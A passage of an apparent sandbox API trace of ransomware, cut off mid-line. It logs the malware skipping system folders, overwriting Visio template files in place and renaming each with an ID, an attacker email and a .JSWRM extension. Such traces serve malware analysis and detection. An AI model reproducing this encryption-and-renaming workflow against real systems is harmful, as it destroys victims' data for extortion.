GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=170295) returned 1 [0145.898] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0145.898] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0145.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.929] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0145.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.930] CloseHandle (hObject=0x314) returned 1 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0145.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0145.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0145.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0145.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0145.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0145.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0145.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0145.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0145.931] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0145.933] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc509, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_U.VSTX", cAlternateFileName="BPMN_U~1.VST")) returned 1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2=".") returned 1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="..") returned 1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="...") returned 1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="windows") returned -1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="recovery") returned -1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="perflogs") returned -1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="documents and settings") returned -1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="system volume information") returned -1 [0145.933] lstrcmpiW (lpString1="BPMN_U.VSTX", lpString2="msocache") returned -1 [0145.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSTX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSTX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_U.VSTX", lpUsedDefaultChar=0x0) returned 11 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0145.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSTX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_U.VSTX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_U.VSTX", lpUsedDefaultChar=0x0) returned 11 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0145.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0145.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0145.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.935] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=50441) returned 1 [0145.935] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc500) returned 0x27b348 [0145.936] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc500, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xc500, lpOverlapped=0x0) returned 1 [0145.971] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.971] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc500, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xc500, lpOverlapped=0x0) returned 1 [0145.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0145.982] CloseHandle (hObject=0x314) returned 1 [0145.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0145.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0145.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0145.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0145.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0145.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0145.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0145.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0145.989] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0145.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0145.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0146.000] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1bc7b4a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf668, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPRES_M.VSSX", cAlternateFileName="BPRES_~1.VSS")) returned 1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2=".") returned 1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="..") returned 1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="...") returned 1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="windows") returned -1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="recovery") returned -1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="perflogs") returned -1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="documents and settings") returned -1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="system volume information") returned -1 [0146.000] lstrcmpiW (lpString1="BPRES_M.VSSX", lpString2="msocache") returned -1 [0146.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPRES_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0146.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPRES_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0146.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0146.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0146.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.002] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=63080) returned 1 [0146.002] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf660) returned 0x27b348 [0146.003] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf660, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf660, lpOverlapped=0x0) returned 1 [0146.028] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.028] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf660, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf660, lpOverlapped=0x0) returned 1 [0146.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.029] CloseHandle (hObject=0x314) returned 1 [0146.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0146.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0146.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0146.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0146.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0146.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0146.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0146.032] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3bd14ac, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3bd14ac, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3bd14ac, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPRES_U.VSSX", cAlternateFileName="BPRES_~2.VSS")) returned 1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2=".") returned 1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="..") returned 1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="...") returned 1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="windows") returned -1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="recovery") returned -1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="perflogs") returned -1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="documents and settings") returned -1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="system volume information") returned -1 [0146.032] lstrcmpiW (lpString1="BPRES_U.VSSX", lpString2="msocache") returned -1 [0146.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPRES_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0146.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPRES_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPRES_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0146.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0146.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0146.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.035] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=62185) returned 1 [0146.035] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf2e0) returned 0x27b348 [0146.035] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf2e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf2e0, lpOverlapped=0x0) returned 1 [0146.088] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.088] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf2e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf2e0, lpOverlapped=0x0) returned 1 [0146.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.089] CloseHandle (hObject=0x314) returned 1 [0146.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0146.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") 